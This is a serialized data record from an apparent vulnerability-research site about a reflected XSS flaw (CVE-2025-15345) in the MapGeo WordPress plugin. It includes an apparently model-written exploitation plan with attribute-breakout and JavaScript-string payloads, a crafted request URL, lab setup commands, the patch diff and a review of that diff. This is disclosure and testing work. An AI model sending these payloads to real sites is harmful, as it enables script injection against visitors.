[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEailBt5VN9GnR6W8VBvRpsSonR0xISe2SdLKLVvSaJw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2025-15345","mapgeo-interactive-geo-maps-reflected-cross-site-scripting-via-map-parameter","MapGeo - Interactive Geo Maps \u003C= 1.6.27 - Reflected Cross-Site Scripting via 'map' Parameter","The MapGeo – Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","interactive-geo-maps",null,"\u003C=1.6.27","1.6.28","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","2026-05-13 17:15:30","2026-05-14 05:30:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbfccbf41-c861-4bf1-b400-7858cb255b9a?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fpublic\u002Fmap-actions\u002Factions.min.js","assets\u002Fpublic\u002Fmap-service\u002Fapp.min.js","interactive-geo-maps.php","readme.txt","src\u002FPlugin\u002FMap.php","vendor\u002Fcomposer\u002Fautoload_static.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"This exploitation research plan targets **CVE-2025-15345**, a reflected Cross-Site Scripting (XSS) vulnerability in the **MapGeo - Interactive Geo Maps** plugin for WordPress.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Reflected Cross-Site Scripting (XSS)\n*   **Location:** `src\u002FPlugin\u002FMap.php`, within the `setup()` method.\n*   **Cause:** The plugin allows the `map` parameter from the URL (`$_GET['map']`) to override the map configuration if the `display-map` shortcode includes a `demo` attribute. While the input is passed through `sanitize_text_field()`, this function only removes HTML tags and does not escape quotes. If the resulting value is reflected into an HTML attribute or a JavaScript context without proper output escaping (e.g., `esc_attr()` or `wp_json_encode()`), an attacker can break out and execute arbitrary scripts.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** Any public post or page containing the `[display-map]` shortcode with the `demo` attribute enabled.\n*   **Vulnerable Parameter:** `map` (GET parameter).\n*   **Authentication:** Unauthenticated.\n*   **Precondition:** A page must exist with a shortcode like `[display-map id=\"123\" demo=\"true\"]`. The `id` must refer to a valid Map (`igmap` post type).\n\n### 3. Code Flow\n1.  A user visits a page where the `[display-map]` shortcode is rendered.\n2.  The shortcode callback instantiates the `Saltus\\WP\\Plugin\\Saltus\\InteractiveMaps\\Plugin\\Map` class and calls `setup( $atts )`.\n3.  In `src\u002FPlugin\u002FMap.php`:\n    *   Line 48: The `$id` is extracted from `$atts['id']`.\n    *   Line 75: The code checks `if ( isset( $atts['demo'] ) && isset( $_GET['map'] ) )`.\n    *   Line 76: If true, `$main_meta['map']` is set to `sanitize_text_field( $_GET['map'] )`.\n4.  `sanitize_text_field()` removes `\u003Cscript>` tags but leaves double quotes (`\"`) and event handlers (like `onmouseover`) intact.\n5.  The `$main_meta` (containing the malicious `map` value) is passed to `prepare_meta()`.\n6.  The value is eventually rendered into the page's HTML (likely as a `data-map` attribute or within a `\u003Cscript>` block containing map configuration), where the lack of output escaping leads to XSS.\n\n### 4. Nonce Acquisition Strategy\nThis is a **Reflected XSS** vulnerability. Since the payload is delivered via a GET parameter to a standard WordPress page rendering a shortcode, **no nonce is required** for exploitation.\n\n### 5. Exploitation Strategy\nThe goal is to provide a payload that breaks out of an HTML attribute and executes JavaScript.\n\n1.  **Payload Selection:** Since `sanitize_text_field` is used, we avoid tags. 
We use an attribute breakout.\n    *   **Payload:** `worldLow\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" x=\"`\n    *   **Mechanism:** This closes the intended attribute, adds an `onmouseover` handler, and stretches the element to cover the entire viewport to ensure the script triggers immediately on any mouse movement.\n\n2.  **HTTP Request:**\n    *   **Method:** `GET`\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002F{PAGE_PATH}\u002F?map=worldLow%22+onmouseover%3D%22alert(document.domain)%22+style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3B%22+x%3D%22`\n    *   **Headers:** Standard browser headers.\n\n### 6. Test Data Setup\nThe automated agent must perform these steps via `wp-cli`:\n\n1.  **Create a Map:**\n    ```bash\n    wp post create --post_type=igmap --post_title=\"Exploit Map\" --post_status=publish\n    ```\n    *Extract the resulting post ID (e.g., `123`).*\n\n2.  **Create a Page with the Shortcode:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Vulnerable Page\" --post_status=publish --post_content='[display-map id=\"123\" demo=\"true\"]'\n    ```\n    *Extract the resulting page URL\u002Fpath (e.g., `\u002Fvulnerable-page\u002F`).*\n\n### 7. Expected Results\n*   The HTTP response will contain the injected string: `worldLow\" onmouseover=\"alert(document.domain)\"`.\n*   The payload will appear inside an HTML tag (likely a `\u003Cdiv>` or `\u003Cscript>` tag depending on the specific rendering path) without the quotes being escaped to `&quot;`.\n*   When viewed in a browser, moving the mouse will trigger the alert.\n\n### 8. Verification Steps\n1.  
**Check Reflection:** Use the `http_request` tool to fetch the page with the payload and grep for the unescaped breakout:\n    ```javascript\n    const response = await http_request.get(\"http:\u002F\u002Flocalhost:8080\u002Fvulnerable-page\u002F?map=worldLow%22+onmouseover%3D%22alert(1)%22\");\n    if (response.body.includes('map=\"worldLow\" onmouseover=\"alert(1)\"')) {\n        console.log(\"Vulnerability Confirmed: Payload reflected unescaped.\");\n    }\n    ```\n2.  **Confirm Lack of Escaping:** Verify that the double quote before `onmouseover` is not converted to `&quot;`.\n\n### 9. Alternative Approaches\nIf the `map` parameter is reflected inside a JavaScript block (e.g., in a JSON object) rather than an HTML attribute:\n*   **Payload:** `worldLow\"-alert(document.domain)-\"`\n*   **Expected Reflection:** `... \"map\":\"worldLow\"-alert(document.domain)-\"\" ...`\n*   This would execute the alert if the surrounding JavaScript is parsed by the browser.","The MapGeo plugin for WordPress is vulnerable to reflected Cross-Site Scripting (XSS) via the 'map' GET parameter. 
When a shortcode is configured with the 'demo' attribute, the plugin accepts an unvalidated map name from the URL, which is reflected into the page without proper attribute escaping, allowing attackers to execute arbitrary JavaScript.","\u002F\u002F src\u002FPlugin\u002FMap.php line 75\n\u002F\u002F in case we use this shortcode for demo purposes, the map that will render might ne in the URL\nif ( isset( $atts['demo'] ) && isset( $_GET['map'] ) ) {\n    $main_meta['map'] = sanitize_text_field( $_GET['map'] );\n}","--- a\u002Fsrc\u002FPlugin\u002FMap.php\n+++ b\u002Fsrc\u002FPlugin\u002FMap.php\n@@ -73,7 +73,7 @@\n         }\n         \u002F\u002F in case we use this shortcode for demo purposes, the map that will render might ne in the URL\n         if ( isset( $atts['demo'] ) && isset( $_GET['map'] ) ) {\n-            $main_meta['map'] = sanitize_text_field( $_GET['map'] );\n+            $main_meta['map'] = preg_replace( '\u002F[^a-zA-Z0-9_\\\u002F]\u002F', '', $_GET['map'] );\n         }\n         $meta = $this->prepare_meta( $main_meta, $id );","To exploit this vulnerability, an attacker identifies a page using the [display-map] shortcode with the 'demo' attribute set to true. The attacker then crafts a malicious URL targeting that page, appending a 'map' GET parameter containing a payload designed to break out of an HTML attribute (e.g., worldLow\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" x=\"). Because the plugin uses sanitize_text_field() which preserves double quotes and does not perform sufficient output escaping, the payload is rendered into the HTML source as an active event handler. When a victim visits the link and moves their mouse over the map area, the injected script executes in their browser context. 
No authentication is required for this attack.","gemini-3-flash-preview","2026-05-14 17:16:24","2026-05-14 17:17:56",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.6.27","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags\u002F1.6.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finteractive-geo-maps.1.6.27.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags\u002F1.6.28","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finteractive-geo-maps.1.6.28.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags"]
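Review bot: the `+` line in the `@@ -73,7 +73,7 @@` hunk only tightens input filtering; the value is still emitted at the sink without escaping, and the research plan on this page names missing output escaping (`esc_attr()` in attribute context, `wp_json_encode()` inside a script block) as the underlying cause, so the render path should escape too, with the allowlist kept as defense in depth. As written, `preg_replace( '/[^a-zA-Z0-9_\/]/', '', $_GET['map'] )` does remove the double quotes, spaces and angle brackets that both payload shapes described above depend on, so the attribute breakout and the `"-alert(...)-"` JavaScript-string variant no longer reach the page; it also silently rewrites any map name containing a character outside that set (a hyphen, for example), so the fix changes behaviour for such names rather than rejecting them, which is worth a note in the changelog. The unchanged context line `// in case we use this shortcode for demo purposes, the map that will render might ne in the URL` carries a typo ("ne" for "be") that could be corrected in the same change.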